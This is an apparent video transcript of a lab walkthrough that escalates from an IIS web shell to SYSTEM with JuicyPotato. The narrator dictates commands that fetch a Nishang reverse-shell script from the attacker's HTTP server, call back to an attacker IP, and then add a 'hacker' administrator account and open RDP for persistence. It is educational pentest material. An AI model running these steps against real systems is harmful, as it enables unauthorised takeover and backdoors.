What's up, everyone? I hope you're all having a good day. In this video, I decided to kind of step away from the hack the box content and cover something else. So in this video, I'll be taking a closer look at a Windows local privilege escalation tool called JuicyPotato. Now, the scenario I've set up is I'm going to set up a vulnerable server with a web shell. So we're going to assume there is already a foothold that you have, and we're going to use JuicyPotato to escalate our privileges. But we're going to do it in a more realistic way, as in I'm going to use JuicyPotato to actually trigger a reverse shell with system privileges. But first, I wanted to talk about it in general. Now, JuicyPotato in general is a tool used for Windows servers 2016 or lower. Now, this doesn't mean that JuicyPotato simply doesn't work on Windows Server 2022. It still can, but some of the COM objects that it does use for the exploit on newer versions of Windows have been patched. So you kind of are relying on servers not being patched as well. The reason I decided to do this, and now some people might say that it could be outdated, but it really isn't. I work with a lot of companies, and you'd be very surprised how many of those still use Windows Server 2016. In fact, I would say 2016 is actually not that old. I sometimes deal with clients that use 2012 or even as low as 2008. So this is certainly not outdated. Even in enterprise companies, you see Windows 2016 being used constantly. The best way to find out any information about the tool, go to its documentation page. In this scenario, JuicyPotato has a GitHub page. So in here, we'll find a ton of information about what this tool is and how it exploits the system. So let's take a look at the actual documentation and try to figure out what exactly is JuicyPotato. So as this says, it is another local privilege escalation tool that can escalate your privileges from a Windows Service account to authority system. As you can see here in the Rotten Potato escalation, it uses bits, but in JuicyPotato, they use COM objects. Now, what exactly are COM objects? COM objects interact with the system, and some software, for example, like File Explorer, Task Scheduler, WMI, Internet Explorer, they all are built and actually use COM to interact with the system. Now, Microsoft has this page. I'll drop a link to this in the description. So this would better explain what exactly is a COM object. As you can see here, COM is a platform independent, distributed, object-oriented system for creating binary software. So that was what I was mentioning, like ActiveX, and we have like, File Explorer and WMI. COM objects can be created with a variety of programming languages, such as C++. COM objects are also used with like Microsoft Word. If you are familiar with VBA scripts, it does use, and a lot of plugins for Outlook also actually are built using COM objects. Like realistically, you don't really have to know the ins and outs of a COM object to perform this, but it's good to understand what it actually is as well, as you don't want to just run tools and hope for the best. Knowing what you're actually are doing is what's going to help you in the long run, really. Now, in order for this exploit to work, there's a few things that we need as prerequisites to use the exploit. First, what we need is an account that has these two privileges. So we need either impersonate privileges or assign primary token privileges, or of course, both. Now, it's very unlikely that you'll find a domain user account or just a regular user that has these permissions. More often than not, it's going to be a service account. Now, the next thing we need for the exploit to work is we need a COM object or a service that we can use to perform this exploit. Now, the way we target a COM object is by using CLSID. What CLSID is, it is an identifier that translates into the COM object or a service. So when using JuicyPotato and you want to target a specific COM object, you use the COM object CLSID to target it. Now, on this GitHub page, we can see here there's another hyperlink that shows you all the CLSIDs that you can pick that are listed by operating system. Now, this isn't an extensive list. It's just the default ones that come with operating system. It's very likely that if you're on your target machine, you could get some CLSIDs that are different to what you see here. So on here, we see there's Windows Server 2016, 2012 Data Center, Windows 10 Enterprise and Professional, and so on. Now, if we click on the 2016 standard, let's just take a look at some of the services. Now, the local service is the service or the COM object running on the machine, and we see its CLSID. When picking the service for the exploit, the most important thing is it needs to be run under system privileges. So this is, as you can see here under user, it tells you which account is used to run a service. Now, the one we obviously want is NT authority system. If we scroll down lower, we see other local services, the current logged in user, etc. But the ones we need for the exploit is going to be system. Now, as I said, this is not an extensive list, and doing your own enumeration should find you more services that ran under system privileges. As far as selecting the right service to use for the exploit, it's kind of a little bit more of a trial and error. There's no method behind the madness. It's just keep trying until you get one that does work. Sometimes some of them can be patched with a security update, and this is why it's important to do your own enumeration, as it's very likely that all these publicly available services can be already patched. Now, the next thing I wanted to take a look before doing the exploit is talk about the usage of JuicyPotato. So if you scroll down lower, it'll tell you some of the parameters. Before going into those, I just wanted to explain what exactly we're going to be doing in this scenario. We're going to use JuicyPotato to launch a PowerShell session with system privileges. And within that command of JuicyPotato, we're going to get the PowerShell session to trigger a reverse shell. So we're going to run a PowerShell script that will get us a reverse shell back onto our local machine. Now, if this sounds confusing, as I go on with the lab, you'll understand a little bit better what I mean, and I'll be able to explain a little bit better when we actually get to that point. So let's first just look at some of the parameters that we do need. So if you run JuicyPotato.exe, we can see here we have -t. So that stands for technique. There are two techniques that you can use with this, which is create process with token. It requires the impersonate privilege, and create process as user, which requires assign primary token. Or we can specify both. So if you use -t and then specify the wildcard, it will try both of these techniques. This is the best way to approach this, as it doesn't really make the script run any longer. So you're better off running the wildcard, so it tries both techniques. The next parameter that's also mandatory is the -b for the program. So this is where we're gonna specify PowerShell.exe. And the listening port -l. So this is basically where the DCOM object is going to be created. It's going to be a fake DCOM object that's going to be listening for incoming connections. And the port, it doesn't really matter. You can pick any number, but by default, it's always, if you look at other walkthroughs or tutorials, it always uses 1337, but it can literally be any number you want. And for some of the optional arguments, as we can see here, most of these will be left as default and you'll never really have to touch. The one we're going to be using in this scenario is going to be the -a. This is going to be the argument. So when we launch PowerShell, we're going to use -a to say what command we want to run within PowerShell. Again, the rest can be left as default, and the -c is the CLSID. This is the COM object or service that you want to target. By default, as we can see here, it targets the bits service. And in this case, we won't use the default. Now, as I said, it is always best to just leave it as default first. If it works, great. And if it doesn't, that's when you can try and mess around with CLSIDs to see if you need to tweak anything and try and make it work. So this is the way you'd specify a CLSID that you want. Later in this simulation, what I'm going to do is I'm going to show you how to enumerate your own CLSIDs, and we'll try a few and see which ones work and which ones don't. Now, sometimes, as I said, it might not work on Windows Server 2022 or 2025 now, but it's always worth a try in case it is unpatched. And as I said before, you'd be very surprised how many companies run outdated servers or do little to no patching at all, especially when it comes to servers or firewalls in particular. Okay, so let's just jump into our lab and I will start walking us through this little solution. Okay, so what I did is I created a scenario where we have a service account that's vulnerable to JuicyPotato. What I did is I actually used this GitHub page for the lab setup. And if you can see here, it shows you step by step on how to set up web server IIS. And using the web server, we're going to upload a web shell in there so it can be exploited from our other local machine, so the Parrot OS machine. Okay, and as you can see here, in here you upload the shell. So if we go to 127.0.0.1. Perfect. So this is the web shell we have uploaded. So I have it running in the C inet pub www.root. So this is the .aspx. So that's the web shell, and which we can reach from the Parrot OS machine. First thing I'm going to do is I'm just going to quickly grab the IP address. Again, in this scenario, we're going to assume that you already have a web shell or some sort of foothold onto the target machine. So let's just check that I can ping it. Okay, so it is working. So I'm going to jump into my browser and I'm going to navigate to the web shell, try my app. Okay, and let's just take a look at it. Hostname. So this is the DC that I have set up on the other environment. And who am I? First, add a space. And as we can see here, the account we're running is one of the web server default service accounts. Let's check privs. All right, so the first thing we're going to do is we're going to turn this web shell into an interactive shell using reverse connection. There's a ton of ways to do this. There's also some publicly available payload that you can use. For example, if we go to revshells.com, in here you can have a ton of payloads here, depending on what exactly you're looking to do. And in this case, we also have PowerShell payloads as well. Now, in this scenario, we're not going to use this because it is a simple TCP connection. It can be quite limiting. And with the PowerShell session, we're going to want to run some scripts to enumerate the CLSIDs. And this payload would not get us a session in which we could do this. Instead, what we're going to use a PowerShell script for a reverse connection. So the one we're going to use there is called invoke PowerShell TCP. Perfect. So this is the one by Nishang. Now, using this PowerShell script, we can get a reverse connection back to our local machine, and we'll have a PowerShell session. Using this will have a much less restrictive shell connection, and we'll be able to run our further enumeration with that. So first, let's download this back onto our local machine. The next thing we're going to do is we're going to actually transfer the invoke PowerShell TCP script onto our target machine. The way I'm going to do this, I'm going to use a HTTP server, a Python HTTP server. So let's just set up our Python server, Python 3 HTTP-m HTTP server, and the port, it doesn't really matter. I'll use 8001 in this scenario. Okay, I'm just going to quickly grab the IP address of this machine. Perfect. Back on our web shell, we're going to launch PowerShell.exe, and we're going to use -c. So this allows us to run a command in a single line. Let's do invoke web request -uri. This is where it's going to be HTTP, the IP address of our local machine, and port 8001. The name of the script invoke PowerShell TCP.ps1. And we're going to do -out file. And this is where we want to store the script. You can store this in a temp folder. I usually tend to just go to the public downloads folder. So let's just go C, users, public. Especially it's an environment that I have full control over. I don't really care about being loud in. So about downloads. And we'll keep the name the same. So invoke PowerShell TCP.ps1. Close our brackets and run it. And there we go. We can see here we have our invoke PowerShell TCP script. So let's take a closer look into the invoke PowerShell TCP script. As we can see here, it does actually give an example on how to run it. So what we need to do here is we need to use invoke PowerShell TCP, bind, or reverse. We'll use the reverse option. It's actually down here. The IP address, this is specified with IPv6, but you can use IPv4 and the port. So let's set up our listener NC LVNP, and let's use 4567. It doesn't really matter. Any free port is fine. Let's jump back into our PowerShell. Okay. The way we're going to do that is we're going to use, again, PowerShell.exe -c. So this allows us to launch PowerShell and run a command immediately. I had to spend a little bit of time to get this to work, so I'm going to show you what way I got it done, and I will leave it down in the link in the description as well of the actual command, so you can at least copy and paste it or see it yourself. So let's go with PowerShell.exe NOP. So this is just to specify that to not carry across any configurations for a profile. So no profile, that's what it stands for. W hidden, so this will just make sure there's no pop-ups for the user to see. And we'll do EP bypass -c. And this is the command we're going to pass in. We're going to use the AND symbol. And we want to import the module first. So let's go import module. Specify the path to the module users, public, downloads. invoke PowerShell TCP.ps1. We're going to use semicolon to split the command. So this allows us to put in the next command without breaking the one-liner. So we'll do invoke PowerShell TCP. We're going to specify reverse. The IP address is 192.168.0.95. So this is your local machine, the Parrot OS machine. And we have our listener on port 4567. So that's what we're going to do, dash port 4567 and close the command. Let's just run it. Okay, and I just forgot to close out the curly braces there. So we're just going to, at the end of port, we're going to use curly braces. And this should get us the connection back. And as we can see here, our listener has picked up a connection from the target machine. So let me just quickly jump back into the terminal. And let's just want to use a text editor there. It doesn't really matter. And I just want to paste in the command itself so you can see what the command looks like in full. Right, so taking a look at it, as we can see here, we asked the web shell to launch PowerShell using no profile and hide the pop-up. We then ran execution policy bypass, and the command we passed in. We first imported the module, which is the invoke PowerShell TCP PS1, and then we separated with a semicolon there, and then we were actually able to run the command that we wanted for the reverse shell. So now we have a connection back to the reverse shell. The reason I've done it is because with a simple TCP connection from these payloads here for the reverse shell would be very limited, especially if we were looking to run more PowerShell scripts. It might not work with these payloads, but having this connection using invoke PowerShell TCP, we should have a lot more control and be able to do a lot more with this. So in our PowerShell session, let's just see who am I. So we have the service account. So now we have a command line. We have an actual shell that we can interact with a little bit better than a web shell. Obviously, the next thing to do is to actually escalate the privilege. So let's go who am I privs. And as we can see here, we have the impersonate and the assign primary token. So this means that we can use this service account to perform JuicyPotato. Now, if you were to perform a JuicyPotato, you usually want it to launch an application. In a practical sense, it's very unlikely that you're going to have a GUI interface, and I'm going to go with more a practical approach. I'm going to pretend that we don't have a GUI interface. I could set up an RDP connection here and remote in and then use JuicyPotato, but what we'll do is I'll run the JuicyPotato. We'll use the JuicyPotato exploit to open PowerShell and to trigger a reverse shell back to us again. So then we'll have system privileges on our reverse shell. And it might sound complicated, but I'll do it step by step so you can kind of see what I mean. Now, before doing this, what I also wanted to look into it is the CLSIDs. Now, we touched on it briefly earlier in the video, but sometimes using the default or the ones that are shown on the GitHub page might keep you very limited. You might miss something. It's best to be able to enumerate all of this yourself. Now, on here, we can see here there is actually a script called get clsid.ps1. What we'll do is we'll use this script. I'll show you how to use it so we can enumerate all the CLSIDs that we can use to potentially perform JuicyPotato on our target machine. The first thing we're going to do is we're going to actually download this back onto our target machine. So I'm actually going to do both. I'm going to do the get clsid.ps1 and also the JuicyPotato.exe. We're going to use the same exact technique. We're going to use our Python script. So Python 3m HTTP server 8001. And we'll do the same thing. We'll use invoke web request to actually download this. And I'm going to keep all these in the same folder. I'm going to keep them all in the public's download folder just so it doesn't get messy and they're all in one spot. Right, before running the script, let's just have a quick look at the code of this script. Now, the first thing this script does, it gathers the CLSIDs, which are located on your local registry. The next thing it'll do, it'll find the app IDs, which are also on the registry, and the app ID will translate into the local service. On the next line of command, it'll join the CLSID back to app ID. So in that case, it will have the app ID, the service, and the CLSID of that service. And down at the very bottom is just the results on how it's going to display it. Now, if you have a GUI interface, you're just going to have a visual table pop up in front of you after the script completes. I will show you this as well. I'll run it here on the GUI interface as well so you can see what it looks like. But in our scenario, we're going to be using the CSV file. So in here, we'll be able to read the CSV file. We can see here, it'll create a folder that translates back to the variable target. And it'll create a CSV file called CLSIDs.csv. Back on our PowerShell session, we're going to run this script. Now, there really isn't all that much to run the script, so we're going to just do get clsid.ps1. And this is all it actually requires. Now, it might take a few minutes for it to complete, and with this session, you're not going to have any output showing the progress only when it completes. Let's just zoom in and let's check the output. Perfect. So we can see here the script has completed, and if we do directory, we'll be able to see that it has created a folder called Windows Server 2016 Standard Evaluation. So that is the variable target. Let's just go into this folder, see Windows. And in here we have the clsid.csv. Let's have a look at the output. Perfect. In here we can see here, if we scroll back up to the very top, we should be able to see which column represents what. So the first column is going to be the app ID, then its local service, and what this local service translates to the CLSID. Okay, now as mentioned as well, I have a GUI interface, of course, for this environment as it is created by myself. I also wanted to show you what the output would look if you were to run this on a GUI interface. So all it does is you run the get clsid.ps1, you'll see a pop-up with exactly the same information, just in a visual table, really. Now, looking at this, we have the three columns, app ID, local service, CLSID. So this is kind of half the battle. So we have all our services, but as you remember, what we do need is we need for that service or the COM object to be run under system privileges. Now, not all of these are run under system privileges. So the next step is to enumerate and figure out which service is run under system privileges, as those are the only ones that we can use for the JuicyPotato exploit. Now, I'm going to show you the two ways to do it. So first, since we are on the GUI interface, I'm going to use just that to figure it out. Actually, I'm going to jump into the theme viewer session. It's a lot faster that way. And the way we're going to do this is we're going to power up cmd. And what we want to take a look is at the local service. So for example, let's take the first one, ALG. I'm not sure if it's ran by system, but we'll figure it out. So what we'll do is SCQC ALG. Okay, and in here we can see here the service start name. So this is the account it's running under. So this is run under local service. What we would want to see here is local system. So let's move on to a different one. SCQC bits. Now this is the default service that the JuicyPotato runs. So we know that there should be a local system. And as you can see here, it is run under local system. And I know there's another one that's running under local system. And just to verify, we'll do SCQC Xbox Live Game Save. And this is also run under local system. So that would be the way to figure out which local service is being ran under which account if you have a GUI interface. Now, in our scenario, as I said, we're going to focus on this as if we don't have a GUI interface. So I'm going to jump back onto my other local machine, and let's just jump back into the PowerShell session. Now, using PowerShell is slightly more difficult than running SCQC on CMD. So I'm going to show you what way we can do it here too. So we're going to use get CIM instance win32 underscore service, capital S, filter and the name, and then we need to select the name we want to filter. So this is the name of the local service. In this case, we'll just use Xbox Live Game Save. We're going to use single bracket and close it out, and double bracket to close out the name parameter. We're going to do pipe, and let's do select name. So we want to filter for the name and the start name. So in this case, we can see here, using PowerShell, we get the same output. We see the local service Xbox Live Game Save is run on their local system, which we already knew. Now for this lab, the next thing we need to do here is, of course, run the actual exploit in itself. Now I remember that when I transferred the JuicyPotato, I didn't show where to actually get this. So it's quite simple, but just in case you're new to using GitHub, you just need to go into the GitHub page of JuicyPotato, and just here on the right, you see releases. If you select on the releases we can see JuicyPotato.exe. So this is the file I downloaded and transferred to the target machine. Okay, so without wasting too much more time, let's just do the exploit. So I'm going to jump back into the directory that the JuicyPotato.exe is at. And we're going to now craft a command that we'll be able to use to trigger a reverse shell. Just to touch on syntax and the commands in general, or payloads, sometimes it can take you quite a long time to get it to finally to work. In this scenario, even for this lab, it took me quite some time to actually get the command to work exactly like how I wanted it to work. You'd be surprised how often you can lose time on stuff that should be straightforward, but a lot of times you end up having to spend an hour, if not even longer, just to make one command work right. I feel like a lot of beginners, they tend to give up quite easy if they don't get the results straight away, but it's a very common thing. If you want to work in this industry, you can easily spend hours on just one command. The reason I'm mentioning this is because that's exactly what happened in this lab scenario. Even though I set it up, it still took me quite some time to get the command to work just right. So I'm going to show you. I will also leave it down below in the description, the exact command that I used to get this to work, but I'm going to show you what way I ran it. So first things first, we're going to do juicy potato.exe -l. So this is the port. As I said, it's a fake decom port. It doesn't really matter what port you select, so we'll do 1400. -d, the technique. As mentioned before, we'll use a wildcard, so he tries to use both techniques. -b is the program that we want Juicy Potato to launch. So we want it to launch PowerShell, Windows, System32, Windows PowerShell, 0 PowerShell.exe. So we're going to specify -a. So this allows us to run a command. When we use -b, it will launch a PowerShell process that's going to be run under system privileges, and -a allows us to run a command within that PowerShell session. So the command we want to run, we want to trigger an invoke PowerShell TCP script again, so we can get another reverse shell back to us with the system privileges this time. So let's run -ep bypass. So this execution policy bypass, and we're going to target only a single file, which is C users public downloads. And it's going to be the invoke PowerShell TCP.ps1. We're going to make sure that there's no execution policies that might be preventing us from running this script. We're going to use the semicolon to separate the command and run our next one. Then we're going to import it by doing .c users public downloads invoke PowerShell TCP.ps1. We're going to separate it again, and let's use invoke PowerShell TCP. This is where we're going to actually run the reverse shell. So we're going to use reverse IP address. I'm going to zoom back out so I can just jump back in and set up my listener. The port, it doesn't really matter as long as it matches your listener. So let's set up NC LVMP. The port we're going to use is 8899. Doesn't matter. Let's jump back into our payload, 8899. Close it off. And the last thing we need to specify is the CLSID. Now, as I said before, running as default first could be the best thing to do. But in this case, obviously, we've done our own enumeration. So let's just use one of the CLSIDs that we've enumerated. So let me just zoom back in and scroll back up to the top to where I can find the output. Perfect. And in this case, we know that the Xbox Live Game Sim runs on the system authority privileges. So let's grab the CLSID and paste it into the command. Close the brackets and let's run it. If we zoom back out, we can see here we have an output saying that you use the CLSID, which will translate back to the Xbox Live Game Save. This is the service account this is the account that runs the service, and this is the technique you used and was successful with. When we look back up top, we can see here we have received our callback. So our listener has a connection, zoom in, and let's just run who am I. This confirms that we have NT authority system right account. And let's do who am I privs. Sorry, who am I priv. From this output, we can see here we have the system account now, and we have complete control over the device. Having full control over the device gives us a lot of options. We can set up backdoors, persistence, privileged users. You can even set up an RDP connection by opening up rules on the firewall, creating accounts, adding them to remote desktop users. Realistically, you're only limited by your imagination at this stage, really. Now, the lab part of this demonstration is completed, but I will also show you how to maybe set up a remote connection. So if you had this access and you wanted to set up an RDP connection, I'll show you how to edit firewall rules so we can allow RDP connections onto the system. I'll show you how to either create a new user or add an existing one to a remote desktop users, and I'll show you how to reset passwords if you want. All right, so the first thing we're going to do is we're going to enable the rule on the firewall to allow RDP connections. I have the command on copy and paste. As always, I'm going to leave that down in the description so you can do this yourself as well. Now, after enabling it on the firewall, we also need to create a registry key that allows RDP connection as well. Again, I'll just have it on copy and paste, easier. Okay, and last firewall rule as well. Okay, so the first thing we're going to do is we're going to create a user account. So we're going to use net user. Let's call it hacker. And the password, it doesn't really matter. We'll set welcome1/add. So I just want to see net users, make sure that has been created. And as we can see here, we have an entry for hacker. Let's go net local group, remote desktop users. We want to select hacker and we want to add it to the group. And I accidentally clicked hash. Let's try running it again. And let's go net local group. This will tell us the users that are part of the remote desktop users. And we can see here we have our user account hacker on this. I'm going to jump into another pane and we'll use x3 RDP. User is going to be hacker. Password welcome1. And the target IP, I think it's just .100.192.168.0.100. Okay. So this is working, but the reason I'm getting this error message is because the machine I have set up is actually a primary domain controller, so it does require that your account is part of the administrators group. So just to prove that it does work, I'm just going to quickly put the hacker account on the administrators group. So we'll go net local group, administrators, hacker-add. And when we run it again, it should give us an RDP connection. And it does. And this leads us to the end of the demonstration and the video in itself. I hope you guys enjoyed this. If you want me to maybe host this VM so you can download and mess around with this yourself, let me know in the comments. I can try figure this out for you guys. And as always, I'm going to leave down in the comments below my socials so you can connect with me if you want. If you have any questions, let me know in the comments. It always makes my day to see some comments. And I just want to say for everyone that did tune in and watch this whole video, thank you. And I hope to see you in the next one.